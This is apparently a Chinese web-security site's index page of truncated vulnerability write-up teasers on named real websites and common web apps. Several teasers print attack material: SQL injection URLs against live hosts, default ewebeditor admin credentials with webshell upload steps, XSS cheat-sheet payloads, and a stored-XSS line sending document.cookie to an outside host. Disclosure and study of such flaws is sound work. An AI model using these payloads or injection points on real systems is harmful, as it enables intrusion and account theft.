PHP代码审计小技巧，PHP字符串偏移特性的分析关注热度:14

0x01 引言这是我在阅读80vul期刊中发表的[PCH-009]Security risk of php string offset一文后，根据自己的理解，对PHP offset这一特性，从实际角度出发，写出的分析。原文地址：http://www.2cto.com/Arti...[详情]

酷6两个注射点 - 网站安全 - 自学php关注热度:12

注入点:http://special.ku6.com/icetea/list.php?special_sort_id=2http://yechang.ku6.com/fans123.php?mid=10183%20and%20%28length%28user%28%29%29%3E19%29=1# 不多深入了..修复方案：这个你懂的作者：数据流..[详情]

蚂蚁游戏官方服务器设置不当及详细修复方案关注热度:13

两个漏洞 服务器解析漏洞 和现在很火的struts2命令执行漏洞0x0.1 解析漏洞随便注册一个用户然后在修改头像这边上传一个包含有恶意代码的图片http://www.gamemayi.com/mayi.website/upload/20120630..[详情]

优酷SWF未清理参数，参数注入导致恶意弹窗 - 网关注热度:12

http://static.youku.com/v1.0.0245/v/swf/loader.swf此FLash接受imglogo参数作为图片地址未检查该参数的有效性即加载该图片因此，当imglogo参数指向一个恶意的flash时（比如：乱弹窗的swf），恶意flash也..[详情]

sphpforum 0.4多个缺陷及修复 - 网站安全 - 自学php关注热度:8

作者: loneferret of Offensive Security影响产品: sphpforum影响版本: 0.4 (older versions may be affected)下载地址: http://sourceforge.net/projects/sphpforum/程序概述# Simple PHP Forum.....[详情]

MaxForum v1.0.0本地文件包含缺陷及修复 - 网站安全关注热度:12

+---------------------------------------+| MaxForum v1.0.0 Local File Inclusion |+---------------------------------------+作者 ahwak2000 z.u5[at]hotmail[dot]com下载地址 http://www.max4dev.....[详情]

ewebeditor上的那些事 - 网站安全 - 自学php关注热度:12

作者：暗月1、常规入侵默认后台：ewebeditor/admin_login.asp默认密码：admin admin8882、默认数据库db/ewebeditor.mdb有时候可能修改成asp 或者是asa进了后台就要上传木马添加aaspsp 或者asa cer aspx ph..[详情]

凤凰网财经分站注入，可获取数据库内容 - 网站关注热度:30

首先http://app.finance.ifeng.com/finance/fundhtml/indexpj.php?pj_type=CHENXINGfund_type=gporderby=abs(jjdm-(length(user())22)*8000)ordertype=asc返回页面而后尝试几个值，到 www.2cto.comhttp://a.....[详情]

QQ邮箱预览word附件造成的xss漏洞 - 网站安全 - 自关注热度:11

预览word附件造成的xss在word文档中添加一个超链接，执行javascript:alert(document.cookie);void(0)修复方案：:)作者 goderci..[详情]

xss攻击汇总 - 网站安全 - 自学php关注热度:19

(1)普通的XSS JavaScript注入SCRIPT SRC=http://3w.org/XSS/xss.js/SCRIPT(2)IMG标签XSS使用JavaScript命令SCRIPT SRC=http://3w.org/XSS/xss.js/SCRIPT(3)IMG标签无分号无引号IMG SRC=javascript:.....[详情]

ASP.NET防止Sql注入攻击的实现 - 网站安全 - 自学关注热度:8

应用范围:ASP.NET vertion 1.1 ASP.NET vertion 2.0概要:文本主要介绍如何校验用户输入从而防止注入式攻击.校验用户输入是非常必要的,几乎所有程序级的攻击都包含恶意输入的手段. 你应该校验..[详情]

XdCMS外卖、订餐、企业网站系统多处漏洞及修复关注热度:10

漏洞文件: System/modeules/member/login.phpif(empty($_COOKIE[#39;member_user#39;])||empty($_COOKIE[#39;member_userid#39;])) //只判断Cookie是否存在漏洞文件:www.2cto.com system/libs/base.class.....[详情]

天翼快递SQL注入点获取系统权限 - 网站安全 - 自关注热度:22

查询时过滤不全导致SQL注射漏洞0x0.1网站首页的公告栏里面的公告http://www.transparcel.com/newsDetail.asp?id=67 存在注入点 有个普通的过滤，SQL通用防注入系统-但是单单用这个过滤还不够的，我..[详情]

图虫网存储型XSS+Cookie泄漏导致账户密码泄漏 -关注热度:12

存储型XSS+Cookie泄漏导致账户泄漏EXIF里信息过滤不严格哈~javascript标签过滤了，script没过滤。我们来构造个/A/DDscriptdocument.write(#39;img src=http://lab.sh1ne.net/snap.php?c=#39;+documen.....[详情]

金山毒霸香港官网SQL注入、敏感信息泄漏、XSS攻关注热度:23

1、SQL注入漏洞：漏洞点：http://www.duba.com.hk:80/support_3_view.php?id=52、一些敏感后台URL：3、敏感信息泄漏：duba.hk.phpinfo.htm www.2cto.com4、文件目录遍历：5、XSS跨站脚本攻击：http://www.duba......[详情]